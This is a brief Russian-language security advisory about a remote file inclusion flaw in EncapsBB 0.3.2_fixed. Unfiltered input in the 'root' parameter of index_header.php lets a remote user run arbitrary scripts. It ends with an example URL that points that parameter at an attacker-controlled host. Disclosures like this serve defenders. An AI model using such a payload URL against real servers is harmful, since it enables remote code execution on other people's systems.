Программа: EncapsBB 0.3.2_fixed
Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на уязвимой системе с привилегиями
web сервера. Уязвимость существует из-за
отсутствия фильтрации входных данных в
параметре root сценария 'index_header.php'. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольный
сценарий на уязвимой системе. Удачная
эксплуатация уязвимости возможна при
включенных опциях 'register_globals' и 'allow_url_fopen' в
конфигурационном файле php.
Пример:
http://[target]/research/boards/encapsbb-0.3.2_fixed/ index_header.php?root=http://[attackerip]/
